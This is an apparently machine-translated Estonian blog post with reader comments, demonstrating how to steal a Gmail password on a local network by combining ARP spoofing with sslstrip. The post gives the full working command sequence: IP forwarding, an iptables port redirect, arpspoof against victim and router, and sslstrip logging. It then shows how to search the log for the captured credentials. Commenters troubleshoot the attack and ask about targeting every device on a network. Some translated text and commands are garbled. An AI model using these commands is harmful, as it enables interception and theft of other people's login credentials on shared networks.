ArpSpoofing ja SSlstrip in Action.

Tere, blogijad.

Tänaseks on mul väike proov sellest, kui ohtlik võib olla ühenduse loomine mis tahes võrgus ilma nende turvalisuseta, mis nii paljudele meist meeldivad.

Tänaseks kavatsen Gmaili parooli saamiseks kasutada ArpSpoofingi koos Sslstripiga. Keskkonna kontrollitavamaks muutmiseks olen loonud konto nimega "testarp@gmail.com".

Ja kuna mulle ei meeldi preambulid väga, siis asume asja kallale.

Ma ei vastuta mingil ajal selle eest, mida nad saavad järgmise teabega teha. Teen seda eranditult hariduslikel eesmärkidel

KESKKOND

Selle testi jaoks on meil järgmine:

1. Ründaja: Debian Wheezy on minu töölaual või lauaarvutil. Hoidlatest saate installida sslriba y nuusutama saada harfivargus

2. Ohver: Ohver on Android-tahvelarvuti, mis soovib oma kirju näha ainult brauseri kaudu.

3. Keskkond: Keskel on minu Cisco DPC2425 ruuter

AADRESSID.

Ründaja aadress: 172.26.0.2

Ruuteri aadress: 172.26.0.1

Ohvri aadress: 172.26.0.8

Rünnak:

Rünnaku toimimise veidi täpsemaks mõistmiseks võite minna minu vana juurde POST

Esimene asi, mida me selle rünnaku jaoks teeme, on aktiveerida edasiliikumine, et meie arvuti saaks teabe ohvrile edastada ilma, et ta seda märkaks. (Muidu oleks see teenuste keelamise rünnak)

Selleks kasutame:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Iga käsk otsekonsooli aknas.

Nüüd, kui teeme saba -f desdelinux me näeme teavet otse ja otse

hetktõmmis1

Kuidas siis saada see, mida tahame?

Sisestame kõigepealt oma meilid tahvelarvutisse. Sisselogimisel näeme, et meie konsoolile ilmub tuhandeid ja tuhandeid asju.

Nüüd, kui see on lõpetatud, avame oma faili "desdelinux” nano-ga

nano desdelinux

Control + W abil otsime midagi nimega TURVAPOSTITUS.

Ja me näeme midagi sellist.

hetktõmmis2

Selle tohutu joone hulgas on ohvri e-posti aadress ja parool.

Niisiis jookseme paremale, kuni lõpuks tunneli lõpus valgust näeme.

hetktõmmis3

Teisel korral näeme, kuidas saame end nende rünnakute eest veidi kaitsta.

seoses


Jäta oma kommentaar

Sinu e-postiaadressi ei avaldata. Kohustuslikud väljad on tähistatud *

*

*

  1. Andmete eest vastutab: Miguel Ángel Gatón
  2. Andmete eesmärk: Rämpsposti kontrollimine, kommentaaride haldamine.
  3. Seadustamine: teie nõusolek
  4. Andmete edastamine: andmeid ei edastata kolmandatele isikutele, välja arvatud juriidilise kohustuse alusel.
  5. Andmete salvestamine: andmebaas, mida haldab Occentus Networks (EL)
  6. Õigused: igal ajal saate oma teavet piirata, taastada ja kustutada.

  1.   @Jlcux DIJO

    Kasutan võimalust ja ütlen, et postituse avaldamise ajal ei olnud käsud õiged.

    Lõpus oleval käsul iptables puudub 8080, mis asub teisel real. Ja siis olid arpspoofi käsud kõik ühel joonel. Iga käsk on erineval real.

    Loodetavasti näeb toimetaja seda ja suudab selle parandada.

    Tervitused.

    1.    Allika käsiraamat DIJO

      Olen teinud teie mainitud parandused, kas see on ok?

      Kui soovite sisestada koodi eelistatud kirjesse, kasutage HTML-vaadet ja veenduge, et artikkel oleks enne ootele saatmist õige. Aitäh.

  2.   Luis DIJO

    On jahutav teada, et need meist, kellel teadmisi pole, on nii haavatavad. Väga hea teave, isegi kui mõistan teemast vähe, mõistan selle olulisust. Aitäh!
    seoses

  3.   giskard DIJO

    Kuid see töötab ainult siis, kui ründaja ja ohver on ühes võrgus. Igal juhul tundub mulle, et kui (samas võrgus olles) ühenduse luua HTTPS-i abil, siis seda ei juhtu, kuna andmed krüpteeritakse ENNE teie arvutist lahkumist. Kui ühendate ühenduse HTTP-ga (ilma S-iga), arvan, et isegi võrgukaablit vaadates näete võtmeid.

    1.    @Jlcux DIJO

      See ei ole tõsi. Häkin gmaili parooli ja kui märkate, kasutab gmail https-i. Niisiis? Asi on selles, et kuigi https on turvaline, sõltub see http-ist. Nii et see pole nii ohutu.

      Ärge tunnistage https-i kohta nii palju, et S pole mõeldud Supermani jaoks, vaid "ohutuks"

    2.    rten DIJO

      see töötab koos https-iga või ilma, olen seda proovinud spetsiaalsema linux distro abil ja see töötab probleemideta

    3.    Allika käsiraamat DIJO

      Saate seda täpselt kasutada, et õpetada neile, kes teie WiFi varastavad, õppetunni. 😀

      See on enam-vähem sarnane sellega, mida nad juba ammu Chema Alonso ajaveebis ütlesid:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant DIJO

        Ostia, suurepärane, mida see teeb! / Ja siis nad ütlevad mu paranoiale iga kord, kui ma kasutan VPN-i, kui nad lähevad pangakontot kontrollima ...). Muide, kommentaarides peate nägema, kui küünilised inimesed on ... kui see lõpuks varastab ...

        1.    eliotime3000 DIJO

          Nüüd peame võtma õpetuse oma VPN-teenuse loomiseks ja pakkumiseks.

      2.    Daniel DIJO

        Teie lingitud lugu on väga huvitav, tundub isegi romaaniraamatu vääriline ja see paneb mind meenutama, kui kasutasin oma naabrite internetti ja ehkki ütlen, et tean seda teemat, arvan, et ei suutnud iialgi näha selle raamatu tegelikke mõõtmeid oht, et ma oleksin võinud kesta, minu õnneks muutsid nad parooli ainult WPA2-ks ja sealt algas minu lugu ISP-ga haha

    4.    Mauricio DIJO

      Sellepärast ütleb pealkiri, et Sslstrip on tegevuses.

      See töötab, kui ründaja on keskel

  4.   Anonüümsed DIJO

    Mis lainet te töötate prismas? -.-
    no.
    Mida ootate oma taotluse saatmiseks XD
    osas
    hea postitus

  5.   auroszx DIJO

    Huvitav, ma teen hiljem hariva testi ... Võib-olla saaksin isegi WiFi parooli eemaldada ja natuke lõbutseda 😛
    Kas saate juhuslikult teha midagi sarnast, et saata erinevad lehed sihtmärgi lehtedele? Näiteks tahavad nad avada Facebooki ja ma suunan nad Google'i? 😛

    1.    @Jlcux DIJO

      Jah. Kuid see kõik on väga erinev rull.

      Võib-olla postitan selle hiljem.

  6.   viimane uustulnuk DIJO

    väga hea postitus, need teemad on väga harivad, nüüd peame suutma sellele rünnakule vastu astuda, kuna mõned (nagu mina) ühenduvad avalike võrkudega (näiteks ülikool), oleks kasulik sellest hoiduda.

    Tervitused!

  7.   just-teine-dl-kasutaja DIJO

    Minu jaoks see ei töötanud 🙁

  8.   vau DIJO

    Midagi ebaõnnestub siin, välja arvatud see, et https-ühendused krüptitakse serverisertifikaadi kaudu (kui teie arvutis on sertifikaat olemas, krüptimise eest vastutab teie brauser) iptablesiga, mille suunate porti 80 (http) , mitte 443, mis on https

    1.    @Jlcux DIJO

      Mõtlesin ka seda. Asi on selles, et kuigi https on "turvaline", sõltub see kahjuks http-ist. Nii et sslstrip kasutab seda ära, see paneb brauseri uskuma, et ta kasutab https-i mandaate, kuid mitte.

      1.    vau DIJO

        püha pask! kuid brauser peaks nägema sellist hoiatust nagu "see sertifikaat pärineb kahtlaselt saidilt või midagi sellist" ... pean kindlasti tegema teste XD

        1.    @Jlcux DIJO

          Ei, absoluutselt mitte midagi ei tule välja.

  9.   just-teine-dl-kasutaja DIJO

    Lõpuks töötas see minu jaoks
    Olen ühendatud parooliga WEP-võrgus ja see näitas mulle igatahes otse parooli.

    Päring. Kas saate teha sama protseduuri, kuid kõigi võrku ühendatud arvutite puhul, selle asemel, et teil oleks üks ohver?

    1.    @Jlcux DIJO

      Jah, sa saad. Kuid ma pole katseid teinud. Proovige ise ja rääkige, kuidas teil läheb.

  10.   19. Sinnick DIJO

    Ainus asi, mis mul sellega kaasneb, on see, et ohvri masin läheb võrguühenduseta, kuid sslstrip ei näita mulle midagi: /

    1.    @Jlcux DIJO

      Peate korraks tulemüüri keelama. Või vähemalt lubage sissetulevad ühendused.

  11.   Mr Black DIJO

    Sondiga nägime ainult facebooki lehe kasutajanime ja parooli, gmailist ei leidnud logist ühtegi tulemust, samuti vajasin ainult arpspoofi rida «arpspoof -i -t«. Teisalt ei suutnud ohvrimasin mõnda lehte avada. Jätkan uurimist, see on väga huvitav. Abi neile, kes kasutavad Manjarot, installimiseks on paketid: dsniff (siin on arpspoff), keerutatud ja python2-pyopenssl. Sslstrip saab alla laadida siit: http://www.thoughtcrime.org/software/sslstrip/
    Selle käivitamiseks $ python2 sslstrip.py
    Tervitused.

  12.   Mr Black DIJO

    See ei tulnud välja, kuid arpspoof-rida on: #arpspoof -i int -t ip-ohver ip-ruuter

  13.   Gilbert DIJO

    ma teen täpselt seda, mida sa ütled:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp - sihtkoha port 80 -j REDIRECT - portidesse 8080

    arpspoof -t -i eth0 172.26.0.8 172.26.0.1
    arpspoof -t -i eth0 172.26.0.1 172.26.0.2

    Probleem on selles, et ohver, kes on veel üks arvuti, mis mul siin toas on, jääb ilma ühenduseta punktini, et pean ruuteri taaskäivitama, mida ma saan teha, mind aidata.

    Teine asi, mida ma töötan virtuaalmasinaga, ja kui täidan käsu iwconfig, ei ilmu ka wlan0 ega ifconfig-i käivitamisel, aga kui mul on virtuaalses masinas Internet, siis eth0-liidesega.